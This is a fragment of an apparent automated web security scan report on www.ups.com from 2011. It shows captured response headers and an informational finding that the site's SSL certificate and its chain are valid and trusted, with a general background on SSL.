Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<META NAME='SWFid.SF' CONTENT='sf'>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html"; charset=utf-8">
<link rel="stylesheet" type="text/css" media="screen" href="/assets/framework/jquery/plugin/jqueryui/ui.all.css?V=0111">
...[SNIP]...

12. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ups.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.ups.com
Issued by:  VeriSign Class 3 Secure Server CA
Valid from:  Sun Apr 12 19:00:00 CDT 2009
Valid to:  Wed Apr 13 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Jan 18 18:00:00 CST 2005
Valid to:  Sun Jan 18 17:59:59 CST 2015

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
